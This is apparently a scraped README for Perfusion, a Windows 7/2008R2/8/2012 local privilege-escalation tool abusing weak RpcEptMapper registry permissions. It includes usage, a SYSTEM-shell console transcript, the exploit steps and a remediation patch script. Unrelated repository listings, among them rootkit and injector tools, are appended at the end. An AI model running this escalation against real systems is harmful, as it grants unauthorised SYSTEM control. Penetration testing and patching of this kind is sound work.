Exploit for the RpcEptMapper registry key permissions vulnerability (Windows 7 / 2088R2 / 8 / 2012)

Overview

Perfusion

On Windows 7, Windows Server 2008R2, Windows 8, and Windows Server 2012, the registry key of the RpcEptMapper and DnsCache (7/2008R2 only) services is configured with weak permissions. Any local user can create a Performance subkey and then leverage the Windows Performance Counters to load an arbitrary DLL in the context of the WMI service as NT AUTHORITY\SYSTEM (hence the tool's name).

This tool is intended to help security consultants during penetration tests. This software is provided as is, and I will probably not provide any support. Though, I tested it thoroughly on three different virtual machines so there should not be any significant issue.

For more information: https://itm4n.github.io/windows-registry-rpceptmapper-eop/

Known issues

⚠️ READ THIS BEFORE USING THIS TOOL ⚠️

During the development phase of this tool, I observed two different behaviors:

  1. The DLL is loaded directly by the main process of the WMI service as NT AUTHORITY\SYSTEM, in this case the exploit works perfectly fine.
  2. The DLL is loaded by a subprocess of the WMI service that runs as NT AUTHORITY\LOCAL SERVICE. In this case, the service loads the DLL while impersonating the client. It turns out a privilege escalation is still possible on Windows 7 (because of another vulnerability) but the implementation cost was not worth the effort.

I am not able to explain this difference because my trigger code was always the same. Anyway, in either case, let the exploit do its job so that it can clean everything up when it's done. If the exploit fails, there is still a chance it will work a few minutes or hours later though.

✔️ Here is what you should see when the exploit works:

C:\Temp>Perfusion.exe -c cmd -i
[*] Created Performance DLL: C:\Users\Lab-User\AppData\Local\Temp\performance_2900_368_1.dll
[*] Created Performance registry key.
[*] Triggered Performance data collection.
[+] Exploit completed. Got a SYSTEM token! :)
[*] Waiting for the Trigger Thread to terminate... OK
[*] Deleted Performance registry key.
[*] Deleted Performance DLL.
Microsoft Windows [Version 6.2.9200]
(c) 2012 Microsoft Corporation. All rights reserved.

C:\Temp>whoami
nt authority\system

C:\Temp>

Here is what you should see when the exploit fails:

C:\Temp>Perfusion.exe -c cmd -i
[*] Created Performance DLL: C:\Users\Lab-User\AppData\Local\Temp\performance_636_3000_1.dll
[*] Created Performance registry key.
[*] Triggered Performance data collection.
[-] Exploit completed but no SYSTEM Token. :/
[*] Waiting for the Trigger Thread to terminate... OK
[*] Deleted Performance registry key.
[*] Deleted Performance DLL.

C:\Temp>

Build instructions

This solution is composed of two projects that need to be compiled in a specific order. Everything is pre-configured, so you just have to follow these simple instructions:

  1. Open the Solution with Visual Studio 2019
  2. Select Release / x64
  3. Build > Build Solution

Usage

You can check the help message using the -h option.

C:\TOOLS>Perfusion.exe -h
 _____         ___         _
|  _  |___ ___|  _|_ _ ___|_|___ ___
|   __| -_|  _|  _| | |_ -| | . |   |  version 0.1
|__|  |___|_| |_| |___|___|_|___|_|_|  by @itm4n

Description:
  Exploit tool for the RpcEptMapper registry key vulnerability.

Options:
  -c   Command - Execute the specified command line
  -i        Interactive - Interact with the process (default: non-interactive)
  -d        Desktop - Spawn a new process on your desktop (default: hidden)
  -h        Help - That's me :)

Remediation / Patch

The following versions of Windows are vulnerable:

Windows version Vulnerable registry keys
Windows 7 RpcEptMapper, DnsCache
Windows Server 2008R2 RpcEptMapper, DnsCache
Windows 8 RpcEptMapper
Windows Server 2012 RpcEptMapper

As far as I know, this vulnerability will not be fixed by Microsoft, for some reason. The best solution is still to upgrade to Windows 10 / Server 2019 but if it is not a short-term option, you can still patch this issue yourself by removing the CreateSubKey permission for both NT AUTHORITY\Authenticated Users and BUILTIN\Users on the following registry keys:

  • HKLM\SYSTEM\CurrentControlSet\Services\RpcEptMapper
  • HKLM\SYSTEM\CurrentControlSet\Services\DnsCache

I created a patch for this vulnerability in the form of a PowerShell script: RegistryPatch.ps1. This script removes the CreateSubKey right on the two above-mentioned registry keys for the following identities: NT AUTHORITY\INTERACTIVE, BUILTIN\Users and/or BUILTIN\Authenticated Users.

  • Check if a machine is vulnerable: (Windows Server 2012 here)
PS C:\Temp> . .\RegistryPatch.ps1; Invoke-RegistryPatch -Verbose
VERBOSE: Registry key: HKLM\SYSTEM\CurrentControlSet\Services\RpcEptMapper
VERBOSE: Found a vulnerable ACE: "NT AUTHORITY\Authenticated Users" has "QueryValues, CreateSubKey, ReadPermissions" rights
VERBOSE: InheritanceFlags: None
VERBOSE: IsInherited: False
VERBOSE: Registry key: HKLM\SYSTEM\CurrentControlSet\Services\RpcEptMapper
VERBOSE: Found a vulnerable ACE: "BUILTIN\Users" has "QueryValues, CreateSubKey, Notify" rights
VERBOSE: InheritanceFlags: None
VERBOSE: IsInherited: False
True
  • Apply the patch: (Windows Server 2008 R2 here)
PS C:\Temp> . .\RegistryPatch.ps1; Invoke-RegistryPatch -Patch -Verbose 
VERBOSE: Registry key: HKLM\SYSTEM\CurrentControlSet\Services\RpcEptMapper
VERBOSE: Found a vulnerable ACE: "NT AUTHORITY\Authenticated Users" has "QueryValues, CreateSubKey, ReadPermissions" rights
VERBOSE: InheritanceFlags: None
VERBOSE: IsInherited: False
VERBOSE: Registry key: HKLM\SYSTEM\CurrentControlSet\Services\RpcEptMapper
VERBOSE: Found a vulnerable ACE: "BUILTIN\Users" has "QueryValues, CreateSubKey, Notify" rights
VERBOSE: InheritanceFlags: None
VERBOSE: IsInherited: False
VERBOSE: Registry key: HKLM\SYSTEM\CurrentControlSet\Services\RpcEptMapper
VERBOSE: The new ACL was applied
VERBOSE: Registry key: HKLM\SYSTEM\CurrentControlSet\Services\DnsCache
VERBOSE: Found a vulnerable ACE: "NT AUTHORITY\INTERACTIVE" has "QueryValues, CreateSubKey, EnumerateSubKeys, ReadPermissions" rights
VERBOSE: InheritanceFlags: None
VERBOSE: IsInherited: False
VERBOSE: Registry key: HKLM\SYSTEM\CurrentControlSet\Services\DnsCache
VERBOSE: Found a vulnerable ACE: "BUILTIN\Users" has "CreateSubKey, ReadKey" rights
VERBOSE: InheritanceFlags: None
VERBOSE: IsInherited: False
VERBOSE: Registry key: HKLM\SYSTEM\CurrentControlSet\Services\DnsCache
VERBOSE: The new ACL was applied
True

How does this exploit work?

Below are the exploit steps that are implemented in this tool:

  1. A Process is created in the background in a suspended state (using the specified command line).
  2. The embedded payload DLL is written to the current user's Temp folder.
  3. A Performance key is created under HKLM\SYSTEM\CurrentControlSet\Services\RpcEptMapper and is populated with the appropriate values, including the full path of the DLL that was created at step 2.
  4. The WMI class Win32_Perf is created and invoked to trigger the collection of Windows Performance Counters.
  5. The DLL is loaded by the WMI service either as NT AUTHORITY\SYSTEM or NT AUTHORITY\LOCAL SERVICE.
  6. If the DLL is loaded by NT AUTHORITY\SYSTEM, its Token is duplicated and is applied to the Process that was initially created by the user at step 1.
  7. Everything is cleaned up and the main Thread of the suspended Process is resumed.
Issues
  • vcruntime140d.dll and ucrtbased.dll required

    vcruntime140d.dll and ucrtbased.dll required

    Hi,

    The dlls in the subject are missing and Perfusion could not run. I tried to googled and found out that I will have to install Visual C++ 2015 x64 14.0.24123, I decided not to remove my current packages as that might nuke other software so I went to the following websites to download the DLL files and save it to the same Debug directory. https://www.dll-files.com/vcruntime140d.dll.html https://www.dll-files.com/ucrtbased.dll.html

    There are quite a lot of versions so I downloaded the following x64 files vcruntime140d.dll - SHA1 - 4021b804469816c3136b40c4ceb44c8d60ed15f5 ucrtbased.dll - SHA1 - 56c2e8fb1af609525b0f732bb67b806bddab3752

    Tried a second time with: vcruntime140d.dll - SHA1 - bcbc1ebd5a592c2df216d3211f309a79f9cd8a9b

    Checked my Windows 10 and I have the following installed. image Running as Administrator CMD, I got the following error 1813 image image

    Checked my Windows Server 2012 and I have the following installed. image image image

    Tried to use the 32 bit files on 2012 and perfusion would not even run. image vcruntime140d.dll - SHA1 - e1b692518cf0d4a67c63ed95c9655c002d79b0cd vcruntime140d.dll - SHA1 - aa18ef3884a6ee4f9e352ed86b958a15d62ce711 vcruntime140d.dll - SHA1 - cd93187f3895dcc8ebb0efeb483eec15b848ef36 ucrtbased.dll - SHA1 - 9529cc4ee868a9f5cf996f7075e45b9619c066a6

    opened by Kinny092 1
  • Perfusion Worker Windows Multipoint

    Perfusion Worker Windows Multipoint

    HI

    Your exploit Perfisiom work in Windows Server Multipoint 2011 SP1 (windows 2008 r2 based)

    look https://www.youtube.com/watch?v=VRs9Q5_0nrs&t=2s

    opened by Marcio861 0
Internet Key Exchange version 2 (IKEv2) daemon - portable version of OpenBSD iked

Portable OpenIKED This is a port of OpenBSD's OpenIKED to different Unix-like operating systems, including Linux, macOS and FreeBSD.

OpenIKED 26 May 23, 2022
Hook up the OnePlus6(T) tri-state key in PostmarketOS!

OnePlus 6(T) tri-state key support in PostmarketOS As the name suggest, the goal of this little project is to hook up the OnePlus6(T) tri-state key in

Michele Perrone 7 Nov 14, 2021
the checkra1n set of tools targeting bare metal, Linux and Windows

Universal toolchain Low-effort cross-compiling for the masses. What's Universal toolchain? It's a collection of sysroots and shell scripts in such a w

null 62 May 27, 2022
Play Doh Windows ACL Tools

PDAcl 是一个支持Windows活动目录扩展权限设置、Windows活动目录常规权限设置、Windows服务权限设置的命令工具。

倾旋 58 Jun 25, 2022
This project aims to facilitate debugging a kernel driver in windows by adding support for a code change on the fly without reboot/unload, and more!

BSOD Survivor Tired of always telling yourself when you got a BSOD that what if I could just return to the caller function which caused the BSOD, and

Ido Westler 142 Jun 20, 2022
CVE-­2021­-1732 Microsoft Windows 10 本地提权漏 研究及Poc/Exploit开发

CVE-2021-1732 CVE-2021-1732 Microsoft Windows 10 本地提权漏 研究及Poc/Exploit开发 受影响系统及应用版本 Windows Server, version 20H2 (Server Core Installation) Windows 10

null 74 Jun 13, 2022
Windows user-land hooks manipulation tool.

MineSweeper Windows user-land hooks manipulation tool. Highlights Supports any x64/x86 Windows DLL (actually, any x64/x86 Windows PE for that matter)

Arsenii Pustovit 126 Jun 15, 2022
Orbit, the Open Runtime Binary Instrumentation Tool, is a standalone C/C++ profiler for Windows and Linux

Orbit, the Open Runtime Binary Instrumentation Tool, is a standalone C/C++ profiler for Windows and Linux. Its main purpose is to help developers visualize the execution flow of a complex application.

Google 2.6k Jun 20, 2022
Windows x64 rootkit

P4tch3r Windows x64 rootkit (tested on Windows 7) It's PoC of patching NtTerminateProcess function by just overwriting instructions catching arguments

null 8 Nov 23, 2021
AlleyWind is an advanced Win32-based and open-sourced utility that helps you to manage system's windows

AlleyWind AlleyWind is an advanced Win32-based and open-sourced utility that helps you to manage system's windows. AlleyWind could: Displays a graphic

KNSoft 17 Jun 20, 2022
WinMerge is an Open Source differencing and merging tool for Windows.

WinMerge is an Open Source differencing and merging tool for Windows. WinMerge can compare both folders and files, presenting differences in a visual text format that is easy to understand and handle.

null 3k Jun 26, 2022
x64 Windows PatchGuard bypass, register process-creation callbacks from unsigned code

NoPatchGuardCallback x64 Windows PatchGuard bypass, register process-creation callbacks from unsigned code Read: https://www.godeye.club/2021/05/22/00

Kento Oki 116 Jun 15, 2022
An asynchronous directory file change watcher module for Windows, macOS and Linux wrapped for V

A V module for asynchronously watching for file changes in a directory. The module is essentially a wrapper for septag/dmon. It works for Windows, macOS and Linux.

null 15 Jun 23, 2022
WhyNotWin11 - Detection Script to help identify why your PC isn't Windows 11 ready

Detection Script to help identify why your PC isn't Windows 11 ready

Robert C. Maehl 5.8k Jun 22, 2022
C/C++ Windows Process Injector for Educational Purposes.

ProcessInjector C/C++ Windows Process Injector for Educational Purposes. What does this software do? This is a simple process injector that uses the C

Berat Çağrı Eroğlu 8 May 3, 2022
Find patterns of vulnerabilities on Windows in order to find 0-day and write exploits of 1-days. We use Microsoft security updates in order to find the patterns.

Back 2 the Future Find patterns of vulnerabilities on Windows in order to find 0-day and write exploits of 1-days. We use Microsoft security updates i

SafeBreach Labs 90 Jun 14, 2022
Windows kernel hacking framework, driver template, hypervisor and API written on C++

Windows kernel hacking framework, driver template, hypervisor and API written on C++

Александр 1.2k Jun 21, 2022
simple and efficient screen recording utility for Windows

wcap Simple and efficient screen recording utility for Windows. Get latest binary here: wcap.exe press Ctrl + PrintScreen to start recording monitor (

Mārtiņš Možeiko 407 Jun 26, 2022
A proof of concept demonstrating instrumentation callbacks on Windows 10 21h1 with a TLS variable to ensure all syscalls are caught.

Instrumentation callbacks are quite a fun undocumented part of Windows. All the code in this repository is released under the MIT license. This repository uses google style C++.

Deputation 38 Jun 22, 2022